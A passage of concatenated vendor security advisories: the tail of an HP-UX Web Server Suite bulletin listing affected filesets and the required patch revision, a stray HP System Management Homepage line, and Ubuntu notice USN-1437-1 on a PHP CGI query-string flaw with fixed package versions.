HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. HP-UX Web Server Suite v3.24 AFFECTED VERSIONS HP-UX B.11.23 ============== hpuxws22APCH32.APACHE hpuxws22APCH32.APACHE2 hpuxws22APCH32.AUTH_LDAP hpuxws22APCH32.AUTH_LDAP2 hpuxws22APCH32.MOD_JK hpuxws22APCH32.MOD_JK2 hpuxws22APCH32.MOD_PERL hpuxws22APCH32.MOD_PERL2 hpuxws22APCH32.PHP hpuxws22APCH32.PHP2 hpuxws22APCH32.WEBPROXY hpuxws22APCH32.WEBPROXY2 hpuxws22APACHE.APACHE hpuxws22APACHE.APACHE2 hpuxws22APACHE.AUTH_LDAP hpuxws22APACHE.AUTH_LDAP2 hpuxws22APACHE.MOD_JK hpuxws22APACHE.MOD_JK2 hpuxws22APACHE.MOD_PERL hpuxws22APACHE.MOD_PERL2 hpuxws22APACHE.PHP hpuxws22APACHE.PHP2 hpuxws22APACHE.WEBPROXY hpuxws22APACHE.WEBPROXY2 action: install revision B.2.2.15.13 or subsequent HP-UX B.11.31 ================== hpuxws22APCH32.APACHE hpuxws22APCH32.APACHE2 hpuxws22APCH32.AUTH_LDAP hpuxws22APCH32.AUTH_LDAP2 hpuxws22APCH32.MOD_JK hpuxws22APCH32.MOD_JK2 hpuxws22APCH32.MOD_PERL hpuxws22APCH32.MOD_PERL2 hpuxws22APCH32.PHP hpuxws22APCH32.PHP2 hpuxws22APCH32.WEBPROXY hpuxws22APCH32.WEBPROXY2 hpuxws22APACHE.APACHE hpuxws22APACHE.APACHE2 hpuxws22APACHE.AUTH_LDAP hpuxws22APACHE.AUTH_LDAP2 hpuxws22APACHE.MOD_JK hpuxws22APACHE.MOD_JK2 hpuxws22APACHE.MOD_PERL hpuxws22APACHE.MOD_PERL2 hpuxws22APACHE.PHP hpuxws22APACHE.PHP2 hpuxws22APACHE.WEBPROXY hpuxws22APACHE.WEBPROXY2 action: install revision B.2.2.15.13 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 14 June 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk/f0GcACgkQ4B86/C0qfVnCEwCfWX2UX+TvBNeJawjexLmPtwjt 1TEAnj7Q3fqZkor5ilSKlW2dNHa1f4aO =pEB+ -----END PGP SIGNATURE----- . HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and Windows. Content-Disposition: inline ==========================================================================Ubuntu Security Notice USN-1437-1 May 04, 2012 php5 vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.04 LTS - Ubuntu 8.04 LTS Summary: Standalone PHP CGI scripts could be made to execute arbitrary code with the privilege of the web server. Software Description: - php5: HTML-embedded scripting language interpreter Details: It was discovered that PHP, when used as a stand alone CGI processor for the Apache Web Server, did not properly parse and filter query strings. Configurations using mod_php5 and FastCGI were not vulnerable. This update addresses the issue when the PHP CGI interpreter is configured using mod_cgi and mod_actions as described in /usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate configuration is used to enable PHP CGI processing, it should be reviewed to ensure that command line arguments cannot be passed to the PHP interpreter. Please see http://people.canonical.com/~ubuntu-security/cve/2012/CVE-2012-2311.html for more details and potential mitigation approaches. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: php5-cgi 5.3.10-1ubuntu3.1 Ubuntu 11.10: php5-cgi 5.3.6-13ubuntu3.7 Ubuntu 11.04: php5-cgi 5.3.5-1ubuntu7.8 Ubuntu 10.04 LTS: php5-cgi 5.3.2-1ubuntu4.15 Ubuntu 8.04 LTS: php5-cgi 5.2.4-2ubuntu5.24 In general, a standard system update will make all the necessary changes